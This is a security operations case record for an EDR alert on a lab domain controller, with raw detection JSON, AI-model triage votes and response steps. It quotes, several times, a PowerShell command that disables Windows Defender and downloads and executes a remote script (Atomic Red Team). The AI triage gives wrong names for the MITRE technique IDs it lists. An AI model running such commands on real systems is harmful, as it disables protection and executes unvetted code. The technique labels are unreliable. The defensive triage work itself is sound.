critical closed true positive

๐Ÿท๏ธ Analyst Verdict Classification

TP by analyst

🤖 AI Analysis

🔔 Detections (1)

00088-WIN-Set-MpPreference_Disabled critical
Rule: service.WIN-Set-MpPreference_Disabled
Hostname: df-labsdc01.dflabs.local · Sensor: e4a1c62d-4d1f-44...
Event Type: NEW_PROCESS
Confidence: 92% · Verdict: true positive
Event Data:
BASE_ADDRESS:
140694944940032
COMMAND_LINE:
PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1021.005 -CheckPrereqs ; Invoke-AtomicTest T1021.005 -GetPrereqs ; Invoke-AtomicTest T1021.005
FILE_IS_SIGNED:
1
FILE_PATH:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
HASH:
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
MEMORY_USAGE:
155828224
PARENT:
{'BASE_ADDRESS': 140698856259584, 'COMMAND_LINE': 'cmd.exe /C C:\\Windows\\TEMP\\pldB3A2.tmp.bat T1021.005 ', 'FILE_IS_SIGNED': 1, 'FILE_PATH': 'C:\\Windows\\System32\\cmd.exe', 'HASH': '3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2', 'MEMORY_USAGE': 4489216, 'PARENT_ATOM': 'd2b1ecad7af81b32ac16ae0d69c2a7fe', 'PARENT_PROCESS_ID': 3496, 'PROCESS_ID': 8396, 'THIS_ATOM': 'd55d696523198bca24198fe369c2a848', 'THREADS': 3, 'TIMESTAMP': 1774364743439, 'USER_NAME': 'NT AUTHORITY\\SYSTEM'}
PARENT_PROCESS_ID:
8396
PROCESS_ID:
7484
THREADS:
31
USER_NAME:
NT AUTHORITY\SYSTEM
IOCs: {'type': 'command_line', 'value': "Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing)"} {'type': 'url', 'value': 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1'} {'type': 'technique', 'value': 'T1021.005 (User Execution via Web Browser)'}
MITRE: T1021.005 - User Execution via Web Browser T1567.001 - Exploitation of Remote Services T1568.001 - Abusing Elevation Control Mechanisms
Analyst Declaration:
📄 Raw Detection JSON
{
  "author": "_soteria-rules-edr-926e2197-189b-4d89-9675-c8993933dc9a[bulk][segment]",
  "cat": "00088-WIN-Set-MpPreference_Disabled",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1021.005 -CheckPrereqs ; Invoke-AtomicTest T1021.005 -GetPrereqs ; Invoke-AtomicTest T1021.005 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 155828224,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pldB3A2.tmp.bat T1021.005 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4489216,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 8396,
        "THIS_ATOM": "d55d696523198bca24198fe369c2a848",
        "THREADS": 3,
        "TIMESTAMP": 1774364743439,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 8396,
      "PROCESS_ID": 7484,
      "THREADS": 31,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "4b0a0986-d73e-4eb4-b561-a59fbcb46da2",
      "event_time": 1774364744023,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 2893,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "d55d696523198bca24198fe369c2a848",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "206ee127bfd4633f7821f3c569c2a84a"
    }
  },
  "detect_id": "75013f97-77ae-4ef1-ada2-02f769c2a84a",
  "detect_mtd": {
    "description": "Set-MpPreference is a powershell commandlet that configures preferences for Windows Defender scans and updates. This detector looks for Set-MpPreference commandlet supplied with the disable flag.",
    "falsepositives": [
      "This should always be considered suspicious as this is indicating an attempt to disable the AV on the system in question."
    ],
    "references": [
      "https://meterpreter.org/the-latest-trickbot-variant-with-stealthy-code-injection-trick-appear/",
      "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/"
    ],
    "tags": [
      "attack.t1562.001",
      "attack.t1059.001"
    ]
  },
  "gen_time": 1774364746922,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364744\u0026selected=206ee127bfd4633f7821f3c569c2a84a",
  "namespace": "general",
  "priority": 3,
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "4b0a0986-d73e-4eb4-b561-a59fbcb46da2",
    "event_time": 1774364744023,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 2893,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "d55d696523198bca24198fe369c2a848",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "206ee127bfd4633f7821f3c569c2a84a"
  },
  "rule_tags": [
    "ext:soteria-rules-edr",
    "attack.t1059.001",
    "attack.t1562.001"
  ],
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "service.WIN-Set-MpPreference_Disabled",
  "ts": 1774364746000
}
๐ŸŒ Threat Intel JSON
{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}
🤖 Triage JSON
{
  "confidence": 0.925,
  "false_positive_reason": null,
  "investigation_questions": [
    "What user or process initiated this command before it was executed by SYSTEM?",
    "Are there any scheduled tasks or startup items that could have triggered this execution?",
    "Has the host been connected to external networks recently?"
  ],
  "ioc_analysis": "The process is running PowerShell.exe but the command line arguments indicate malicious behavior: disabling real-time monitoring via Set-MpPreference, using IEX to download and execute code from an external source (GitHub), and invoking Atomic Red Team testing modules. While the file path is legitimate (System32) and the binary is signed, the context of execution (disabling security controls + remote code execution) overrides these benign indicators.",
  "iocs_extracted": [
    {
      "type": "command_line",
      "value": "Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing)"
    },
    {
      "type": "url",
      "value": "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1"
    },
    {
      "type": "technique",
      "value": "T1021.005 (User Execution via Web Browser)"
    }
  ],
  "mitre_techniques": [
    "T1021.005 - User Execution via Web Browser",
    "T1567.001 - Exploitation of Remote Services",
    "T1568.001 - Abusing Elevation Control Mechanisms"
  ],
  "recommended_actions": [
    "ESCALATE to Incident Response (unanimous AI verdict)",
    "Isolate affected sensor immediately",
    "Isolate the host immediately to prevent lateral movement or data exfiltration.",
    "Block outbound traffic to raw.githubusercontent.com and redcanaryco domains at the network perimeter.",
    "Review recent PowerShell execution logs for other suspicious IEX commands.",
    "Check for persistence mechanisms installed alongside Atomic Red Team deployment."
  ],
  "risk_score": 88,
  "severity": "critical",
  "summary": "**Vote: UNANIMOUS (2/2 -\u003e TRUE POSITIVE)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a confirmed malicious execution of PowerShell commands designed to disable Windows Defender real-time protection and deploy the Atomic Red Team framework. The command line explicitly includes IEX (Invoke-Expression) with a remote URL from GitHub, which is a classic technique for downloading and executing arbitrary code.\n\n**IOC Analysis:** The process is running PowerShell.exe but the command line arguments indicate malicious behavior: disabling real-time monitoring via Set-MpPreference, using IEX to download and execute code from an external source (GitHub), and invoking Atomic Red Team testing modules. While the file path is legitimate (System32) and the binary is signed, the context of execution (disabling security controls + remote code execution) overrides these benign indicators.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.9\nThe detection event involves a PowerShell process running as SYSTEM, attempting to disable Windows Defender real-time monitoring and install Atomic Red Team, which is commonly associated with red teaming and evasion techniques.\n\n**IOC Analysis:** The FILE_PATH is C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe, which is a legitimate system binary in its expected location and signed by Microsoft, making it unlikely to be malicious on its own. However, the command line includes suspicious actions such as disabling antivirus and downloading scripts from GitHub, indicating potential malicious intent.",
  "verdict": "true_positive",
  "voting": {
    "auto_action": "escalate_ir",
    "mode": "unanimous",
    "total_models": 2,
    "vote_summary": [
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: true_positive (high, 90% confidence)"
    ],
    "votes": [
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.9,
        "model": "deepseek-r1:8b",
        "verdict": "true_positive"
      }
    ],
    "winning_count": 2,
    "winning_verdict": "true_positive"
  }
}

โš™๏ธ Response Actions

Action Target Status Result
tag e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated failed 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
recommended ESCALATE to Incident Response (unanimous AI verdict) executed General Activity Sweep: 0 events found
recommended Isolate affected sensor immediately executed General Activity Sweep: 0 events found
recommended Isolate the host immediately to prevent lateral movement or data exfiltration. executed Lateral Movement Investigation: 50 events found
recommended Block outbound traffic to raw.githubusercontent.com and redcanaryco domains at the network perimeter. executed User Activity Investigation: 31 events found
recommended Review recent PowerShell execution logs for other suspicious IEX commands. executed General Activity Sweep: 0 events found
recommended Check for persistence mechanisms installed alongside Atomic Red Team deployment. executed Persistence Check: 0 events found

๐Ÿ“ Add Note

๐Ÿ’ฌ Notes (7)

๐Ÿค– FusionSOC AI 2026-03-24T17:01
๐Ÿค– FusionSOC AI 2026-03-24T17:01
๐Ÿค– FusionSOC AI 2026-03-24T17:01
๐Ÿค– FusionSOC AI 2026-03-24T17:01
๐Ÿค– FusionSOC AI 2026-03-24T17:01
๐Ÿค– FusionSOC AI 2026-03-24T17:01
๐Ÿค– FusionSOC AI 2026-03-24T17:01

๐Ÿ“œ Timeline

2026-03-24T17:24:18
analyst
Status changed: investigating → closed
2026-03-24T17:23:59
analyst
Analyst classified as True Positive (TP)
2026-03-24T17:01:55
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T17:01:55
FusionSOC
Action recommended → executed: Persistence Check: 0 events found
2026-03-24T17:01:55
FusionSOC AI
Note by FusionSOC AI: ## 🔍 Persistence Check **Action:** Check for persistence mechanisms installed alongside Atomic Red Team deployment. **Se...
2026-03-24T17:01:53
FusionSOC
Response action queued: recommended on Check for persistence mechanisms installed alongside Atomic Red Team deployment.
2026-03-24T17:01:53
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T17:01:53
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T17:01:53
FusionSOC AI
Note by FusionSOC AI: ## 🔍 General Activity Sweep **Action:** Review recent PowerShell execution logs for other suspicious IEX commands. **Sen...
2026-03-24T17:01:53
FusionSOC
Response action queued: recommended on Review recent PowerShell execution logs for other suspicious IEX commands.
2026-03-24T17:01:53
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T17:01:53
FusionSOC
Action recommended → executed: User Activity Investigation: 31 events found
2026-03-24T17:01:53
FusionSOC AI
Note by FusionSOC AI: ## 🔍 User Activity Investigation **Action:** Block outbound traffic to raw.githubusercontent.com and redcanaryco domains...
2026-03-24T17:01:52
FusionSOC
Response action queued: recommended on Block outbound traffic to raw.githubusercontent.com and redcanaryco domains at the network perimeter.
2026-03-24T17:01:52
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T17:01:52
FusionSOC
Action recommended → executed: Lateral Movement Investigation: 50 events found
2026-03-24T17:01:52
FusionSOC AI
Note by FusionSOC AI: ## 🔍 Lateral Movement Investigation **Action:** Isolate the host immediately to prevent lateral movement or data exfiltr...
2026-03-24T17:01:51
FusionSOC
Response action queued: recommended on Isolate the host immediately to prevent lateral movement or data exfiltration.
2026-03-24T17:01:51
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T17:01:51
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T17:01:51
FusionSOC AI
Note by FusionSOC AI: ## 🔍 General Activity Sweep **Action:** Isolate affected sensor immediately **Sensor:** `e4a1c62d-4d1f-44...` **Time Win...
2026-03-24T17:01:51
FusionSOC
Response action queued: recommended on Isolate affected sensor immediately
2026-03-24T17:01:51
FusionSOC AI
Status changed: open → investigating
2026-03-24T17:01:51
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T17:01:51
FusionSOC AI
Note by FusionSOC AI: ## 🔍 General Activity Sweep **Action:** ESCALATE to Incident Response (unanimous AI verdict) **Sensor:** `e4a1c62d-4d1f-...
2026-03-24T17:01:51
FusionSOC
Response action queued: recommended on ESCALATE to Incident Response (unanimous AI verdict)
2026-03-24T17:01:50
FusionSOC
Action tag → failed: 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
2026-03-24T17:01:50
FusionSOC
Response action queued: tag on e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated
2026-03-24T17:01:50
FusionSOC AI
Detection 75013f97-77ae-4ef1-ada2-02f769c2a84a triaged as true_positive (critical severity, confidence: 92%)
2026-03-24T17:01:50
FusionSOC AI
Case created from detection: service.WIN-Set-MpPreference_Disabled